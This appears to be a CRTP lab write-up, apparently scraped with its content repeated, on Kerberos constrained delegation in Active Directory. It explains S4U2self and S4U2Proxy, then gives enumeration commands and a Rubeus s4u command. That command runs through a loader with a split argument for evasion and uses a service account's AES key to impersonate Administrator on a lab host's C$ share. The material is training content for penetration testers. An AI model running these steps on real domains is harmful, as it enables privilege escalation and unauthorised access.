Constrained Delegation

Domain Admin can allow a computer to impersonate a user or computer against a service of a machine.

Last updated 11 months ago

Constrained Delegation

Domain Admin can allow a computer to impersonate a user or computer against a service of a machine.

Constrained Delegation

Constrained Delegation when enabled on a service account, allows access only to specified services on specified computers as a user.
A typical scenario where constrained delegation is used - A user authenticates to a web service without using Kerberos and the web service makes requests to a database server to fetch results based on the user's authorization.

Let's assume that a user authenticates to web server with service account websvc using a non-kerberos compatible authentication.

The web services requests a ticket from KDC for user's account without supplying a password as the websvc account.

The KDC checks if constrained delegation is enabled on the server and checks if the user is not blocked for delegation. If these two checks are OK, the KDC returns a forwardable TGS (S4U2self) to the web server on behalf of Joe.

Service for User to Self (S4U2self): Allows a service to obtain a forwadable TGS to itself on behalf of a user.

The web server sends the ticket back to the KDC and requests a ticket for the SPN.

The KDC checks if SPN is listed in the "msDS-AllowedToDelegateTo" on the websvc account. If the service is listed, it will return a service ticket for the machine in which the SPN exists (S4U2Proxy).

Service for User to Proxy (S4U2Proxy): Allows a service to obtain a TGS to a second service on behalf of a user.

The web service can now authenticate to the SPN as the user using the TGS.

Enumerate users and computers with constrained delegation enabled

# PowerView
Get-DomainUser -TrustedToAuth
Get-DomainComputer -TrustedToAuth

# AD Module
Get-ADObject -Filter {msDS-AllowedToDelegateTo -ne "$null"} -Properties msDS-AllowedToDelegateTo

Abuse with Rubeus

We use the websvc hash to request TGS as Domain Administrator from KDC and import it.

# ArgSplit for "s4u"

C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args %Pwn% /user:websvc /aes256:2d84a12f614ccbf3d716b8339cbbe1a650e5fb352edc8e879470ade07e5412d7 /impersonateuser:Administrator /msdsspn:"CIFS/dcorp-mssql.dollarcorp.moneycorp.LOCAL" /ptt

klist

Now we can access the CIFS service

C:\Windows\system32>dir \\dcorp-mssql.dollarcorp.moneycorp.local\c$

PreviousCRTP Lab 15 NextCRTP Lab 16

Last updated 11 months ago

Constrained Delegation

Constrained Delegation when enabled on a service account, allows access only to specified services on specified computers as a user.
A typical scenario where constrained delegation is used - A user authenticates to a web service without using Kerberos and the web service makes requests to a database server to fetch results based on the user's authorization.

Let's assume that a user authenticates to web server with service account websvc using a non-kerberos compatible authentication.

The web services requests a ticket from KDC for user's account without supplying a password as the websvc account.

Service for User to Self (S4U2self): Allows a service to obtain a forwadable TGS to itself on behalf of a user.

The web server sends the ticket back to the KDC and requests a ticket for the SPN.

The KDC checks if SPN is listed in the "msDS-AllowedToDelegateTo" on the websvc account. If the service is listed, it will return a service ticket for the machine in which the SPN exists (S4U2Proxy).

Service for User to Proxy (S4U2Proxy): Allows a service to obtain a TGS to a second service on behalf of a user.

The web service can now authenticate to the SPN as the user using the TGS.

Enumerate users and computers with constrained delegation enabled

# PowerView
Get-DomainUser -TrustedToAuth
Get-DomainComputer -TrustedToAuth

# AD Module
Get-ADObject -Filter {msDS-AllowedToDelegateTo -ne "$null"} -Properties msDS-AllowedToDelegateTo

Abuse with Rubeus

We use the websvc hash to request TGS as Domain Administrator from KDC and import it.

# ArgSplit for "s4u"

C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args %Pwn% /user:websvc /aes256:2d84a12f614ccbf3d716b8339cbbe1a650e5fb352edc8e879470ade07e5412d7 /impersonateuser:Administrator /msdsspn:"CIFS/dcorp-mssql.dollarcorp.moneycorp.LOCAL" /ptt

klist

Now we can access the CIFS service

C:\Windows\system32>dir \\dcorp-mssql.dollarcorp.moneycorp.local\c$